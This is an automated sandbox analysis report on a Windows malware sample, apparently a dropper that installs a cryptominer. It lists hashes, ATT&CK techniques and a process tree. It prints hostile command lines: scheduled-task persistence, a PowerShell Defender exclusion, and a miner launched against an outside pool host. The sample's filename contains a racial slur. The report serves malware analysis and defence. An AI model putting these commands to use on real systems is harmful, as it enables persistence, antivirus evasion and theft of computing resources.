5536d8e31ee96b4cdfbd1a1b485cb13960f01ddf218ee8d17f42f5f02b41d68e

Resubmissions

07-07-2022 07:45

220707-jlmt7afdal 10

07-04-2022 05:16

220407-fx5btsbhf2 8

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
07-07-2022 07:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BstNiggaStub.exe
Size

1017KB
MD5

6a63a4741f5d8561a08069dab3c9afbc
SHA1

4cceb4ccf7a1d488bc7a4b67ced920c7fcbec8a2
SHA256

5536d8e31ee96b4cdfbd1a1b485cb13960f01ddf218ee8d17f42f5f02b41d68e
SHA512

1afc1ec86a900827257b7fff7f2a598a0b35ef3f489a7ea11fe0d6a130335550ac6032a18e2c425429e06aae52ed89c84697ac9d12b3080cc2ee9b95b9ca9dab

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

WindowsFinder.exeWindowsFinder.exe

pid process

3248 WindowsFinder.exe
3168 WindowsFinder.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

BstNiggaStub.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation BstNiggaStub.exe
Loads dropped DLL 6 IoCs

Processes:

WindowsFinder.exeWindowsFinder.exe

pid process

3168 WindowsFinder.exe
3168 WindowsFinder.exe
3168 WindowsFinder.exe
3248 WindowsFinder.exe
3248 WindowsFinder.exe
3248 WindowsFinder.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4036 1572 WerFault.exe BstNiggaStub.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4132 schtasks.exe
4808 schtasks.exe

pid	process
3248	WindowsFinder.exe
3168	WindowsFinder.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	BstNiggaStub.exe

pid	process
3168	WindowsFinder.exe
3168	WindowsFinder.exe
3168	WindowsFinder.exe
3248	WindowsFinder.exe
3248	WindowsFinder.exe
3248	WindowsFinder.exe

pid	pid_target	process	target process
4036	1572	WerFault.exe	BstNiggaStub.exe

pid	process
4132	schtasks.exe
4808	schtasks.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

BstNiggaStub.exepowershell.exe

pid	process
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1772	powershell.exe
1772	powershell.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

BstNiggaStub.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1572 BstNiggaStub.exe
Token: SeDebugPrivilege 1772 powershell.exe

description	pid	process
Token: SeDebugPrivilege	1572	BstNiggaStub.exe
Token: SeDebugPrivilege	1772	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

BstNiggaStub.exe

description	pid	process	target process
PID 1572 wrote to memory of 1276	1572	BstNiggaStub.exe	RegAsm.exe
PID 1572 wrote to memory of 1276	1572	BstNiggaStub.exe	RegAsm.exe
PID 1572 wrote to memory of 1276	1572	BstNiggaStub.exe	RegAsm.exe
PID 1572 wrote to memory of 3588	1572	BstNiggaStub.exe	schtasks.exe
PID 1572 wrote to memory of 3588	1572	BstNiggaStub.exe	schtasks.exe
PID 1572 wrote to memory of 4132	1572	BstNiggaStub.exe	schtasks.exe
PID 1572 wrote to memory of 4132	1572	BstNiggaStub.exe	schtasks.exe
PID 1572 wrote to memory of 4808	1572	BstNiggaStub.exe	schtasks.exe
PID 1572 wrote to memory of 4808	1572	BstNiggaStub.exe	schtasks.exe
PID 1572 wrote to memory of 1772	1572	BstNiggaStub.exe	powershell.exe
PID 1572 wrote to memory of 1772	1572	BstNiggaStub.exe	powershell.exe
PID 1572 wrote to memory of 3248	1572	BstNiggaStub.exe	WindowsFinder.exe
PID 1572 wrote to memory of 3168	1572	BstNiggaStub.exe	WindowsFinder.exe
PID 1572 wrote to memory of 3248	1572	BstNiggaStub.exe	WindowsFinder.exe
PID 1572 wrote to memory of 3168	1572	BstNiggaStub.exe	WindowsFinder.exe

C:\Users\Admin\AppData\Local\Temp\BstNiggaStub.exe
"C:\Users\Admin\AppData\Local\Temp\BstNiggaStub.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:1276

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn WindowsService /f
2⤵
PID:3588

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn WindowsService /tr "C:\Users\Admin\AppData\Roaming\Windows Folder\Windows Service.exe" /sc onlogon /rl highest
2⤵
- Creates scheduled task(s)
PID:4132

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn WindowsServiceUpload /tr "C:\Users\Admin\AppData\Roaming\Windows Folder\Windows Service.exe" /f /rl highest
2⤵
- Creates scheduled task(s)
PID:4808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Folder'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe
"C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe" -w EQBRanNZsA8KNoHEWSKpN4yahYET0g8dcctSXT0c3cNAfNax -p https://server1.whalestonpool.com -api ":8080"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3248

C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe
"C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe" -w EQBRanNZsA8KNoHEWSKpN4yahYET0g8dcctSXT0c3cNAfNax -p https://server1.whalestonpool.com -api ":8080"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3168

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1572 -s 2420
2⤵
- Program crash
PID:4036

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 1572 -ip 1572
1⤵
PID:4612

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\OpenCL.dll
Filesize
28KB

MD5
75c82cc70a4a8f9878959edc4e40e067

SHA1
b3858343b9e2befcc28fd465fd377da451186033

SHA256
534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc

SHA512
68e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\OpenCL.dll
Filesize
28KB

MD5
75c82cc70a4a8f9878959edc4e40e067

SHA1
b3858343b9e2befcc28fd465fd377da451186033

SHA256
534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc

SHA512
68e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\OpenCL.dll
Filesize
28KB

MD5
75c82cc70a4a8f9878959edc4e40e067

SHA1
b3858343b9e2befcc28fd465fd377da451186033

SHA256
534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc

SHA512
68e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe
Filesize
6.2MB

MD5
5b69b37c6acf7203fcef43fb3f1b794d

SHA1
538caf62f25dea9d174f02aead4dc846ebadc345

SHA256
6fec5ac27cb10fab24e7068393dd05dc3d811498df175a0999ba4add71791ba5

SHA512
ee4e0a86692e82ad0a79707ce0840341bc79cf8be4ee8f2a01012968fc75ffb4625017645cec069dd5e3d7b12060ef747a4d6aa5d1b3461ba0cedea777df814f

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe
Filesize
6.2MB

MD5
5b69b37c6acf7203fcef43fb3f1b794d

SHA1
538caf62f25dea9d174f02aead4dc846ebadc345

SHA256
6fec5ac27cb10fab24e7068393dd05dc3d811498df175a0999ba4add71791ba5

SHA512
ee4e0a86692e82ad0a79707ce0840341bc79cf8be4ee8f2a01012968fc75ffb4625017645cec069dd5e3d7b12060ef747a4d6aa5d1b3461ba0cedea777df814f

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\libcrypto-1_1-x64.dll
Filesize
3.3MB

MD5
32d7e884189e301c3cd4b6993abb283f

SHA1
793fa8e8e51c591c520e906061313e8f97287440

SHA256
5862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519

SHA512
b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\libcrypto-1_1-x64.dll
Filesize
3.3MB

MD5
32d7e884189e301c3cd4b6993abb283f

SHA1
793fa8e8e51c591c520e906061313e8f97287440

SHA256
5862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519

SHA512
b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\libcrypto-1_1-x64.dll
Filesize
3.3MB

MD5
32d7e884189e301c3cd4b6993abb283f

SHA1
793fa8e8e51c591c520e906061313e8f97287440

SHA256
5862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519

SHA512
b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\toncrypto.dll
Filesize
3.6MB

MD5
703f25116760b08f24401832edb0014f

SHA1
631bdb041296c58849648a447afd7046246747a1

SHA256
c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558

SHA512
566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\toncrypto.dll
Filesize
3.6MB

MD5
703f25116760b08f24401832edb0014f

SHA1
631bdb041296c58849648a447afd7046246747a1

SHA256
c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558

SHA512
566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\toncrypto.dll
Filesize
3.6MB

MD5
703f25116760b08f24401832edb0014f

SHA1
631bdb041296c58849648a447afd7046246747a1

SHA256
c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558

SHA512
566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b

Download Submit
memory/1572-143-0x0000022135140000-0x0000022135152000-memory.dmp

Filesize
72KB

Download
memory/1572-141-0x0000022134E24000-0x0000022134E27000-memory.dmp

Filesize
12KB

Download
memory/1572-137-0x0000022133FB9000-0x0000022133FBF000-memory.dmp

Filesize
24KB

Download
memory/1572-159-0x0000022134E24000-0x0000022134E27000-memory.dmp

Filesize
12KB

Download
memory/1572-161-0x0000022134E27000-0x0000022134E2C000-memory.dmp

Filesize
20KB

Download
memory/1572-136-0x0000022133F90000-0x0000022133F9A000-memory.dmp

Filesize
40KB

Download
memory/1572-142-0x0000022134E27000-0x0000022134E2C000-memory.dmp

Filesize
20KB

Download
memory/1572-160-0x0000022134E20000-0x0000022134E24000-memory.dmp

Filesize
16KB

Download
memory/1572-158-0x00007FFDDBEA0000-0x00007FFDDC961000-memory.dmp

Filesize
10.8MB

Download
memory/1572-131-0x00007FFDDBEA0000-0x00007FFDDC961000-memory.dmp

Filesize
10.8MB

Download
memory/1572-140-0x0000022134E20000-0x0000022134E24000-memory.dmp

Filesize
16KB

Download
memory/1572-130-0x00000221197A0000-0x00000221197CA000-memory.dmp

Filesize
168KB

Download
memory/1772-135-0x0000000000000000-mapping.dmp

Download
memory/1772-139-0x00007FFDDBEA0000-0x00007FFDDC961000-memory.dmp

Filesize
10.8MB

Download
memory/1772-138-0x0000023F5CC30000-0x0000023F5CC52000-memory.dmp

Filesize
136KB

Download
memory/1772-144-0x00007FFDDBEA0000-0x00007FFDDC961000-memory.dmp

Filesize
10.8MB

Download
memory/3168-146-0x0000000000000000-mapping.dmp

Download
memory/3248-145-0x0000000000000000-mapping.dmp

Download
memory/3588-132-0x0000000000000000-mapping.dmp

Download
memory/4132-133-0x0000000000000000-mapping.dmp

Download
memory/4808-134-0x0000000000000000-mapping.dmp

Download